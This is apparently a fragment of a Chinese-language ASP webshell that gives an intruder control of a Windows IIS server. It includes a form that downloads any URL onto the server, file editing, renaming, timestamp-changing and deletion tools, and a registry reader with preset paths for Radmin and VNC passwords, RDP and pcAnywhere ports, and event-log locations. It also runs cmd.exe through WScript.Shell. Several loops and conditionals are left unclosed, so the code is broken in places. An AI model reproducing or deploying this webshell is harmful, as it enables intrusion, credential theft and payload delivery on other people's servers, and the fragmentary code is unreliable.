Dim oItem, sPath, aParam, oFolder
If isDebugMode = False Then On Error Resume Next
aParam = Split(GetPost("param"), ",")
sPath = GetPost("truePath")
If Right(sPath, 1) = "\" And Len(sPath) > 3 Then sPath = Left(sPath, Len(sPath) - 1)
Set oFolder = oShl.NameSpace(sPath)
Set oItem = oFolder.ParseName(aParam(0))
If aParam(1) <> "" Then
If sFlag = "Name" Then oItem.Name = aParam(1)
If sFlag = "LM" And IsDate(aParam(1)) Then oItem.ModifyDate = aParam(1)
End If
Set oItem = Nothing
Set oFolder = Nothing
End Sub
Sub PageOtherTools()
Dim theAct
theAct = Request("theAct")
If theAct <> "" Then Response.Clear
Select Case theAct
Case "DownFromUrl"
Case "ReadReg"
Response.Write("<style>body{font-size:12px;}</style>" & vbNewLine)
Case "ReadRegX"
Response.Write("<style>body{font-size:12px;}</style>" & vbNewLine)
Case "FileCombiner"
If InStr(thePath, ":") <= 0 Then thePath = Server.MapPath(thePath)
End Select
If theAct <> "" Then Response.End()
Echo "<form method=post action='' target=_blank>"
Echo Replace(sHeader, "{$s}", "文件組合工具(程序不檢查文件存在性)")
Echo "<tr><td colspan=2> <input size=80 name=thePath value=""F:\Tools\FileName_Blocks\FileName_5(最后一個(gè)文件的相對(duì)路徑或者絕對(duì)路徑)""/>"
Echo "<input type=hidden value=FileCombiner name=theAct>"
Echo "<input type=hidden value=PageOtherTools name=PageName>"
Echo "<input type=submit value='組 合'></td></tr>"
Echo sFooter
Echo "</form>"
Echo "<form method=post target=_blank>"
Echo "<input type=hidden value=PageOtherTools name=PageName>"
Echo Replace(sHeader, "{$s}", "下載到服務(wù)器")
Echo "<tr><td colspan=2> <input name=theUrl value='http://' size=80><input type=submit value='下 載'></td></tr>"
Echo "<tr><td colspan=2> <input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
Echo "<input type=checkbox name=overWrite value=2>存在覆蓋</td></tr>"
Echo "<input type=hidden value=DownFromUrl name=theAct>"
Echo sFooter
Echo "</form>"
Echo "<form method=post action='' target=_blank>"
Echo Replace(sHeader, "{$s}", "文件編輯")
Echo "<tr><td colspan=2> <input size=80 name=truePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANSLATED")) & """>"
Echo "<input type=hidden value=showedit name=theAct>"
Echo "<select name=PageName><option value=PageApp>用Stream</option><option value=PageFso>用FSO</option></select>"
Echo "<input type=submit value='打 開'></td></tr>"
Echo sFooter
Echo "</form>"
Echo "<form method=post target=_blank>"
Echo Replace(sHeader, "{$s}", "注冊(cè)表鍵值讀取")
Echo "<input type=hidden value=PageOtherTools name=PageName>"
Echo "<input type=hidden value=ReadReg name=theAct>"
Echo "<tr><td colspan=2> "
Echo "<select onChange='this.form.thePath.value=this.value;'>"
Echo "<option value=''>選擇自帶</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots\/'>WebPath</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter'>RadminPass</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port'>RadminPort</option>"
Echo "<option value='HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password'>VNC3Pass</option>"
Echo "<option value='HKEY_CURRENT_USER\Software\ORL\WinVNC3\PortNumber'>VNC3Port</option>"
Echo "<option value='HKEY_LOCAL_, MACHINE\SOFTWARE\RealVNC\WinVNC4\Password'>VNC4Pass</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\PortNumber'>VNC4Port</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp\PortNumber'>TerminalPort</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber'>TerminalPort</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort'>PcAnyWhereDataPort</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort'>PcAnyWhereStatusPort</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\File'>Application Log</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security\File'>Security Log</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\File'>System Log</option>"
Echo "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
Echo "</select><br />"
Echo " <input name=thePath value='' size=80>"
Echo "<input type=button value='讀 鍵' onclick=""this.form.theAct.value='ReadRegX';this.form.submit();"">"
Echo "<input type=button value='讀鍵值' onclick=""this.form.theAct.value='ReadReg';this.form.submit();"">"
Echo "</td></tr>"
Echo sFooter
Echo "</form>"
End Sub
Sub DownFromUrl()
If isDebugMode = False Then On Error Resume Next
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("Adodb.Stream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If overWrite <> 2 Then
overWrite = 1
End If
Http.Open "GET", theUrl, False
If Http.ReadyState <> 4 Then
Exit Sub
End If
With stream
.Type = 1
.Mode = 3
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
If Err.Number = 3004 Then
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
End With
AlertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下載成功!")
Set Http = Nothing
Set Stream = Nothing
End Sub
Sub FileCombiner(sFilePath)
If isDebugMode = False Then On Error Resume Next
Dim sFolder, sFileName, iFileCount, oStream, oStreamB
Set oStream = Server.CreateObject("Adodb.Stream")
Set oStreamB = Server.CreateObject("Adodb.Stream")
sFileName = Mid(sFilePath, InStrRev(sFilePath, "\") + 1)
sFolder = Left(sFilePath, InStrRev(sFilePath, "\"))
iFileCount = Mid(sFileName, InStrRev(sFileName, "_") + 1)
sFileName = Left(sFileName, InStrRev(sFileName, "_") - 1)
oStream.Type = 1
oStream.Mode = 3
oStreamB.Type = 1
For i = 1 To iFileCount
oStreamB.LoadFromFile(sFolder & "\" & sFileName & "_" & i)
oStream.Write oStreamB.Read()
oStream.SaveToFile sFolder & "\" & sFileName, 2
Set oStream = Nothing
Set oStream = Nothing
End Sub
Sub ReadReg()
If isDebugMode = False Then On Error Resume Next
Dim i, thePath, theArray
thePath = Request("thePath")
theArray = oWshl.RegRead(thePath)
If IsArray(theArray) Then
For i = 0 To UBound(theArray)
Echo "<li>" & theArray(i)
Echo "<li>" & theArray
End If
End Sub
Sub ReadRegX()
Dim sCmd, sResult
If isDebugMode = False Then On Error Resume Next
sCmd = "RegEdit.exe /e """ & rootPath & "\ReadRegX"" """ & thePath & """"
oWshl.Run sCmd, 0, True
sResult = oWshl.Exec("cmd.exe /c type " & rootPath & "\ReadRegX").StdOut.ReadAll()
Echo StrEncode(sResult)
sResult = oWshl.Exec("cmd.exe /c del " & rootPath & "\ReadRegX").StdOut.ReadAll()
Echo "<br />" & sResult
End Sub
Function DBDownTheFile(oValue)
Response.AddHeader "Content-Disposition", "Attachment; Filename=UnKnown.UnKnown"
Response.AddHeader "Content-Length", LenB(oValue)
Response.Charset = "UTF-8"
Response.ContentType = "Application/Octet-Stream"
Response.BinaryWrite oValue
End Function
Sub PageOther()
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border-width: 1px;
border-top-style: none;
border-right-style: solid;
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function wsLoadIFrame(){
cmdResult.document.body.innerHTML = "<form name=frm method=post action=\"?\"><input type=hidden name=PageName value=PageSaCmdRun /><input type=hidden name='theAct' value='readResult' /></form>";
function locate(str){
var frm = document.forms[1];
frm.theAct.value = str;
frm.TheObj.value = '';
function checkAllBox(obj){
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str = prompt('請(qǐng)輸入新名稱(位置)\n另存為和移動(dòng)操作無法直接更改文件名.', strTmp);
if(str && (strTmp != str)){
frm.param.value += str;
}else return;
frm.theAct.value = cmd;
frm.param.value = str + ',';
str = prompt('請(qǐng)輸入新的"最后修改時(shí)間".', strTmp);
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frm.param.value+= str;
if(cmd == 'download'){
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frm.theAct.value = 'dbdownfile';
frm.param.value+= '!' + str;
eval("frm." + str + "_Column.value=''");
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frm.theAct.value = '';
if(cmd == 'del'){
if(confirm('您確認(rèn)要?jiǎng)h除選中的 ' + j + ' 個(gè)文件(夾)嗎?')){
frm.theAct.value = 'del';
}else return;
if(cmd == 'newone')
if(strTmp = prompt('請(qǐng)輸入要新建的文件(夾)名\nApp文件瀏覽操作器只能新建文件', '')){
frm.theAct.value = 'newone';
frm.param.value = strTmp + ',' + str;
}else return;
if(cmd == 'move' || cmd == 'copy'){
frm.theAct.value = cmd;
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frm.param.value = str;
frm.target = '_blank';
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if(str == '0'){
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frm.param.value = str;
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frm.theAct.value = 'ShowTables';
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frm.PageName.value = 'PageDBTool';
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frm.PageName.value = 'PageUpload';
frm.thePath.value = frm.truePath.value;
frm.target = '_blank';
if(cmd == 'pack'){
if(confirm('您確認(rèn)要打包選中的 ' + j + ' 個(gè)項(xiàng)目嗎?')){
frm.PageName.value = 'PagePack';
frm.theAct.value = 'PackOne';
frm.target = '_blank';
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frm.target = '';
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frm.theAct.value = 'edit';
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frm.target = '_blank';
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var frm = document.forms[1];
frm.theAct.value = 'del';
frm.param.value = column + '!' + str;
frm.target = '_blank';
frm.target = '';
function preView(n){
var url, win;
if(n != '1'){
url = document.forms[1].truePath.value
window.open('/' + escape(url));
win = window.open("about:blank", "", "resizable=yes,scrollbars=yes");
win.document.write('<style>body{border:none;}</style>' + document.forms[1].fileContent.innerText);
End Sub
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